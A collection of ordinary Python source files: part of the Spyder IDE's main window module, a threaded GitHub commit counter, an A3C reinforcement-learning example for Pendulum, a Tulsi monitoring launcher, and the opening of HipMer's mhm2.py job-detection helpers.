self.previous_focused_widget = old
def closing(self, cancelable=False, close_immediately=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
self.plugin_registry = PLUGIN_REGISTRY
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
can_close = self.plugin_registry.delete_all_plugins(
excluding={Plugins.Layout},
close_immediately=close_immediately)
if not can_close and not close_immediately:
return False
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
if self.layouts is not None:
self.layouts.save_current_window_settings(prefix)
try:
layouts_container = self.layouts.get_container()
if layouts_container:
layouts_container.close()
layouts_container.deleteLater()
self.layouts.deleteLater()
self.plugin_registry.delete_plugin(
Plugins.Layout, teardown=False)
except RuntimeError:
pass
self.already_closed = True
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
QApplication.processEvents()
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
console = self.get_plugin(Plugins.Console, error=False)
if console:
if state:
console.redirect_stds()
else:
console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
editor = self.get_plugin(Plugins.Editor, error=False)
variableexplorer = self.get_plugin(
Plugins.VariableExplorer, error=False)
if encoding.is_text_file(fname):
if editor:
editor.load(fname)
elif variableexplorer is not None and ext in IMPORT_EXT:
variableexplorer.get_widget().import_data(fname)
elif not external:
fname = file_uri(fname)
start_file(fname)
def get_initial_working_directory(self):
"""Return the initial working directory."""
return self.INITIAL_CWD
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
# Check that file exists
fname = encoding.to_unicode_from_fs(fname)
initial_cwd = self.get_initial_working_directory()
if osp.exists(osp.join(initial_cwd, fname)):
fpath = osp.join(initial_cwd, fname)
elif osp.exists(fname):
fpath = fname
else:
return
# Don't open script that starts Spyder at startup.
# Fixes issue spyder-ide/spyder#14483
if sys.platform == 'darwin' and 'bin/spyder' in fname:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
with open(self.SPYDER_PATH, 'r', encoding='utf-8') as f:
path = f.read().splitlines()
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
with open(self.SPYDER_NOT_ACTIVE_PATH, 'r',
encoding='utf-8') as f:
not_active_path = f.read().splitlines()
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
OrderedDict([('/some/path, True), ('/some/other/path, False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
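    # Illustrative sketch (not part of Spyder): the OrderedDict format that
    # save_python_path() above and update_python_path() below expect -- paths
    # as keys, active state as values. The paths themselves are assumptions.
    #
    #     new_path_dict = OrderedDict([
    #         ('/home/user/projects/lib_a', True),    # active
    #         ('/home/user/projects/lib_b', False),   # kept, but inactive
    #     ])
    #     main_window.update_python_path(new_path_dict)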
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
def _dialog_finished(result_code):
"""Restore path manager dialog instance variable."""
self._path_manager = None
if self._path_manager is None:
from spyder.widgets.pathmanager import PathManager
projects = self.get_plugin(Plugins.Projects, error=False)
read_only_path = ()
if projects:
read_only_path = tuple(projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.finished.connect(_dialog_finished)
dialog.show()
else:
self._path_manager.show()
self._path_manager.activateWindow()
self._path_manager.raise_()
self._path_manager.setFocus()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
projects = self.get_plugin(Plugins.Projects, error=False)
self.project_path = ()
if projects:
self.project_path = tuple(projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
            except Exception:
pass
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
self.preferences.open_dialog(self.prefs_dialog_size)
def set_prefs_size(self, size):
"""Save preferences dialog size."""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
        while True:  # keep accepting connections until the server is closed
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
if self.already_closed:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
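    # Illustrative sketch (not part of this module): the client side of the
    # single-instance protocol served by start_open_files_server() above.
    # A second invocation would send the file path over the local socket and
    # wait for the one-byte acknowledgement sent by req.sendall(b' ').
    # The file path is an assumption for the example.
    #
    #     import socket
    #     client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    #     client.connect(('127.0.0.1', CONF.get('main', 'open_files_port')))
    #     client.sendall('/path/to/script.py'.encode('utf-8'))
    #     client.recv(1)
    #     client.close()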
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False, close_immediately=False):
"""Wrapper to handle plugins request to restart Spyder."""
self.application.restart(
reset=reset, close_immediately=close_immediately)
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
# Note: The +6 pixel on the top makes it look better
# FIXME: Why is this using the toolbars menu? A: To not be on top of
# the toolbars.
# Probably toolbars should be taken into account for this 'delta' only
        # when they are visible
delta_top = (self.toolbar.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(MainWindow, app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
if get_debug_level() > 0:
delete_debug_log_files()
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Set color for links ****
set_links_color(app)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(
MainWindow, app, splash, options, args
)
else:
mainwindow = create_window(MainWindow, app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
streams.py
|
import threading
import time

import requests

start = time.time()

URL = 'https://api.github.com/repos/{name}/{repo}/commits?page=1&per_page=100'

repos = {
    'Zinko17': 'RestProject',
    'cholponesn': 'StomCentr',
    'aliyaandabekova': 'THE_BEST_PRICE',
    'zhumakova': 'SportBetProject',
}
result = {}


def worker(username, repository):
    """Fetch up to 100 commits for one repository and record how many came back."""
    url = URL.format(name=username, repo=repository)
    response = requests.get(url).json()
    # Each thread writes a distinct key, so the shared dict needs no extra locking here.
    result[username] = len(response)


threads = []
for username, repository in repos.items():
    t = threading.Thread(target=worker, args=(username, repository))
    t.start()
    threads.append(t)

for t in threads:
    t.join()

print(time.time() - start)
print(result)
|
A3C.py
|
"""
Asynchronous Advantage Actor Critic (A3C) with continuous action space, Reinforcement Learning.
The Pendulum example.
View more on my tutorial page: https://morvanzhou.github.io/tutorials/
Using:
tensorflow 1.8.0
gym 0.10.5
"""
import multiprocessing
import threading
import tensorflow as tf
import numpy as np
import gym
import os
import shutil
import matplotlib.pyplot as plt
GAME = 'Pendulum-v0'
OUTPUT_GRAPH = True
LOG_DIR = './log'
N_WORKERS = multiprocessing.cpu_count()
MAX_EP_STEP = 200
MAX_GLOBAL_EP = 2000
GLOBAL_NET_SCOPE = 'Global_Net'
UPDATE_GLOBAL_ITER = 10
GAMMA = 0.9
ENTROPY_BETA = 0.01
LR_A = 0.0001 # learning rate for actor
LR_C = 0.001 # learning rate for critic
GLOBAL_RUNNING_R = []
GLOBAL_EP = 0
env = gym.make(GAME)
N_S = env.observation_space.shape[0]
N_A = env.action_space.shape[0]
A_BOUND = [env.action_space.low, env.action_space.high]
class ACNet(object):
def __init__(self, scope, globalAC=None):
if scope == GLOBAL_NET_SCOPE: # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_params, self.c_params = self._build_net(scope)[-2:]
else: # local net, calculate losses
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_his = tf.placeholder(tf.float32, [None, N_A], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
mu, sigma, self.v, self.a_params, self.c_params = self._build_net(scope)
td = tf.subtract(self.v_target, self.v, name='TD_error')
with tf.name_scope('c_loss'):
self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('wrap_a_out'):
mu, sigma = mu * A_BOUND[1], sigma + 1e-4
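                    # mu comes from a tanh head in (-1, 1), so scaling by A_BOUND[1] maps it onto
                    # the action range; the small 1e-4 offset keeps sigma strictly positive.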
normal_dist = tf.distributions.Normal(mu, sigma)
with tf.name_scope('a_loss'):
log_prob = normal_dist.log_prob(self.a_his)
exp_v = log_prob * tf.stop_gradient(td)
entropy = normal_dist.entropy() # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
with tf.name_scope('choose_a'): # use local params to choose action
self.A = tf.clip_by_value(tf.squeeze(normal_dist.sample(1), axis=[0, 1]), A_BOUND[0], A_BOUND[1])
with tf.name_scope('local_grad'):
self.a_grads = tf.gradients(self.a_loss, self.a_params)
self.c_grads = tf.gradients(self.c_loss, self.c_params)
with tf.name_scope('sync'):
with tf.name_scope('pull'):
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]
self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]
with tf.name_scope('push'):
self.update_a_op = OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params))
self.update_c_op = OPT_C.apply_gradients(zip(self.c_grads, globalAC.c_params))
def _build_net(self, scope):
w_init = tf.random_normal_initializer(0., .1)
with tf.variable_scope('actor'):
l_a = tf.layers.dense(self.s, 200, tf.nn.relu6, kernel_initializer=w_init, name='la')
mu = tf.layers.dense(l_a, N_A, tf.nn.tanh, kernel_initializer=w_init, name='mu')
sigma = tf.layers.dense(l_a, N_A, tf.nn.softplus, kernel_initializer=w_init, name='sigma')
with tf.variable_scope('critic'):
l_c = tf.layers.dense(self.s, 100, tf.nn.relu6, kernel_initializer=w_init, name='lc')
v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
return mu, sigma, v, a_params, c_params
def update_global(self, feed_dict): # run by a local
SESS.run([self.update_a_op, self.update_c_op], feed_dict) # local grads applies to global net
def pull_global(self): # run by a local
SESS.run([self.pull_a_params_op, self.pull_c_params_op])
def choose_action(self, s): # run by a local
s = s[np.newaxis, :]
return SESS.run(self.A, {self.s: s})
class Worker(object):
def __init__(self, name, globalAC):
self.env = gym.make(GAME).unwrapped
self.name = name
self.AC = ACNet(name, globalAC)
def work(self):
global GLOBAL_RUNNING_R, GLOBAL_EP
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
s = self.env.reset()
ep_r = 0
for ep_t in range(MAX_EP_STEP):
# if self.name == 'W_0':
# self.env.render()
a = self.AC.choose_action(s)
s_, r, done, info = self.env.step(a)
                done = ep_t == MAX_EP_STEP - 1  # unwrapped Pendulum never terminates; treat the last step as terminal
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append((r + 8) / 8) # normalize
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = SESS.run(self.AC.v, {self.AC.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
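                    # Bootstrapped n-step returns, computed backwards through the buffer:
                    # v_target(t) = r_t + GAMMA * v_target(t+1), seeded with v(s_T) (0 if terminal).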
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.vstack(buffer_a), np.vstack(buffer_v_target)
feed_dict = {
self.AC.s: buffer_s,
self.AC.a_his: buffer_a,
self.AC.v_target: buffer_v_target,
}
self.AC.update_global(feed_dict)
buffer_s, buffer_a, buffer_r = [], [], []
self.AC.pull_global()
s = s_
total_step += 1
if done:
if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(0.9 * GLOBAL_RUNNING_R[-1] + 0.1 * ep_r)
print(
self.name,
"Ep:", GLOBAL_EP,
"| Ep_r: %i" % GLOBAL_RUNNING_R[-1],
)
GLOBAL_EP += 1
break
if __name__ == "__main__":
SESS = tf.Session()
with tf.device("/cpu:0"):
OPT_A = tf.train.RMSPropOptimizer(LR_A, name='RMSPropA')
OPT_C = tf.train.RMSPropOptimizer(LR_C, name='RMSPropC')
GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its params
workers = []
# Create worker
for i in range(N_WORKERS):
i_name = 'W_%i' % i # worker name
workers.append(Worker(i_name, GLOBAL_AC))
COORD = tf.train.Coordinator()
SESS.run(tf.global_variables_initializer())
if OUTPUT_GRAPH:
if os.path.exists(LOG_DIR):
shutil.rmtree(LOG_DIR)
tf.summary.FileWriter(LOG_DIR, SESS.graph)
worker_threads = []
for worker in workers:
        # Bind the method directly; "lambda: worker.work()" late-binds the loop variable and
        # can end up starting several threads on the same (last) worker.
        t = threading.Thread(target=worker.work)
t.start()
worker_threads.append(t)
COORD.join(worker_threads)
plt.plot(np.arange(len(GLOBAL_RUNNING_R)), GLOBAL_RUNNING_R)
    plt.xlabel('episode')
plt.ylabel('Total moving reward')
plt.show()
|
Tulsi.py
|
#!/usr/bin/env python
# Copyright (c) 2015 Vedams Software Solutions PVT LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing
from TulsiClientMain import TulsiClientMain
from TulsiStatsdClientMain import TulsiStatsdClientMain
from Server_Monitor import Server_Monitor
def tulsiclient():
name = multiprocessing.current_process().name
tulsimain = TulsiClientMain()
def tulsistatsdclient():
name = multiprocessing.current_process().name
tulsistatsd = TulsiStatsdClientMain()
#def tulsimonitorclient():
# name = multiprocessing.current_process().name
# tulsimonitor=TulsiMonitorMain()
if __name__ == '__main__':
tulsiclientmain = multiprocessing.Process(name='udp client main',
target=tulsiclient)
tulsistatsdclientmain =\
multiprocessing.Process(name='udp statsd client main',
target=tulsistatsdclient)
#tulsiservicemain = multiprocessing.Process(name='monitor main',
# target=tulsimonitorclient)
tulsiclientmain.start()
tulsistatsdclientmain.start()
#tulsiservicemain.start()
servicetulsi = Server_Monitor()
servicetulsi.alert_module()
|
mhm2.py
|
#!/usr/bin/env python
# HipMer v 2.0, Copyright (c) 2020, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory (subject to receipt of any required
# approvals from the U.S. Dept. of Energy). All rights reserved."
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
# (1) Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# (2) Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
# (3) Neither the name of the University of California, Lawrence Berkeley National
# Laboratory, U.S. Dept. of Energy nor the names of its contributors may be used to
# endorse or promote products derived from this software without specific prior
# written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
# SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
# You are under no obligation whatsoever to provide any bug fixes, patches, or upgrades
# to the features, functionality or performance of the source code ("Enhancements") to
# anyone; however, if you choose to make your Enhancements available either publicly,
# or directly to Lawrence Berkeley National Laboratory, without imposing a separate
# written license agreement for such Enhancements, then you hereby grant the following
# license: a non-exclusive, royalty-free perpetual license to install, use, modify,
# prepare derivative works, incorporate into other computer software, distribute, and
# sublicense such enhancements or derivative works thereof, in binary and source code
# form.
from __future__ import print_function
import signal
import subprocess
import sys
import os
import datetime
import time
import traceback
import argparse
import threading
import io
import string
import multiprocessing
import collections
SIGNAMES = ['SIGHUP', 'SIGINT', 'SIGQUIT', 'SIGILL', 'SIGTRAP', 'SIGABRT', 'SIGBUS', 'SIGFPE', 'SIGKILL', 'SIGUSR1',
'SIGSEGV', 'SIGUSR2', 'SIGPIPE', 'SIGALRM', 'SIGTERM', 'SIGSTKFLT', 'SIGCHLD', 'SIGCONT', 'SIGSTOP', 'SIGTSTP',
'SIGTTIN', 'SIGTTOU', 'SIGURG', 'SIGXCPU', 'SIGXFSZ', 'SIGVTALRM', 'SIGPROF', 'SIGWINCH', 'SIGIO', 'SIGPWR', 'SIGSYS']
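# SIGNAMES is indexed by (signal number - 1), i.e. SIGHUP == 1; the
# SIGNAMES[_proc.returncode - 1] lookups below map a return code back to a name.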
_orig_sighdlr = None
_proc = None
_output_dir = ''
_err_thread = None
_stop_thread = False
def print_red(*args):
print("\033[91m", *args, sep='', end='', file=sys.stderr)
print("\033[00m", file=sys.stderr)
_defaultCores = None
def get_hdw_cores_per_node():
"""Query the hardware for physical cores"""
global _defaultCores
if _defaultCores is not None:
return _defaultCores
try:
import psutil
cores = psutil.cpu_count(logical=False)
print("Found %d cpus from psutil" % cores)
except (NameError, ImportError):
#print("Could not get cpus from psutil")
pass
# always trust lscpu, not psutil
# NOTE some versions of psutil has bugs and comes up with the *WRONG* physical cores
if True:
import platform
cpus = multiprocessing.cpu_count()
hyperthreads = 1
if platform.system() == 'Darwin':
for line in os.popen('sysctl -n hw.physicalcpu').readlines():
hyperthreads = cpus / int(line)
print("Found %d cpus and %d hyperthreads from sysctl" % (cpus, hyperthreads))
else:
for line in os.popen('lscpu').readlines():
if line.startswith('Thread(s) per core'):
hyperthreads = int(line.split()[3])
print("Found %d cpus and %d hyperthreads from lscpu" % (cpus, hyperthreads))
cores = int(cpus / hyperthreads)
_defaultCores = cores
return cores
def get_job_id():
"""Query the environment for a job"""
for key in ['PBS_JOBID', 'SLURM_JOBID', 'LSB_JOBID', 'JOB_ID', 'COBALT_JOBID', 'LOAD_STEP_ID', 'LBS_JOBID']:
if key in os.environ:
return os.environ.get(key)
return str(os.getpid())
def get_job_name():
"""Query the env for the name of a job"""
    for key in ['PBS_JOBNAME', 'JOBNAME', 'SLURM_JOB_NAME', 'LSB_JOBNAME', 'JOB_NAME']:
if key in os.environ:
return os.environ.get(key)
return ""
def is_cobalt_job():
return os.environ.get('COBALT_JOBID') is not None
def is_slurm_job():
return os.environ.get('SLURM_JOB_ID') is not None
def is_pbs_job():
return os.environ.get('PBS_JOBID') is not None
def is_lsb_job():
return os.environ.get('LSB_JOBID') is not None
def is_ge_job():
return os.environ.get('JOB_ID') is not None
def is_ll_job():
return os.environ.get('LOAD_STEP_ID') is not None
def get_slurm_cores_per_node(defaultCores = 0):
# Only trust this environment variable from slurm, otherwise trust the hardware
if defaultCores == 0:
defaultCores = get_hdw_cores_per_node()
ntasks_per_node = os.environ.get('SLURM_NTASKS_PER_NODE')
if ntasks_per_node:
print("Found tasks per node from SLURM_NTASKS_PER_NODE=", ntasks_per_node)
return int(ntasks_per_node)
# This SLURM variable defaults to all the hyperthreads if not overriden by the sbatch option --ntasks-per-node
ntasks_per_node = os.environ.get('SLURM_TASKS_PER_NODE') # SLURM_TASKS_PER_NODE=32(x4)
if ntasks_per_node:
if ntasks_per_node.find('(') > 0:
ntasks_per_node = int(ntasks_per_node[:ntasks_per_node.find('(')])
else:
ntasks_per_node = int(ntasks_per_node)
if ntasks_per_node <= defaultCores:
print("Detected slurm job restricts cores to ", ntasks_per_node, " because of SLURM_TASKS_PER_NODE=", os.environ.get('SLURM_TASKS_PER_NODE'))
return ntasks_per_node
print("Using default cores of ", defaultCores, ". Ignoring tasks per node ", ntasks_per_node, " from SLURM_TASKS_PER_NODE=", os.environ.get('SLURM_TASKS_PER_NODE'))
return defaultCores
def get_cobalt_cores_per_node():
ntasks_per_node = os.environ.get('COBALT_PARTCORES')
return int(ntasks_per_node)
def get_lsb_cores_per_node():
# LSB_MCPU_HOSTS=batch2 1 h22n07 42 h22n08 42
lsb_mcpu = os.environ.get('LSB_MCPU_HOSTS')
host_core = lsb_mcpu.split()
return int(host_core[-1])
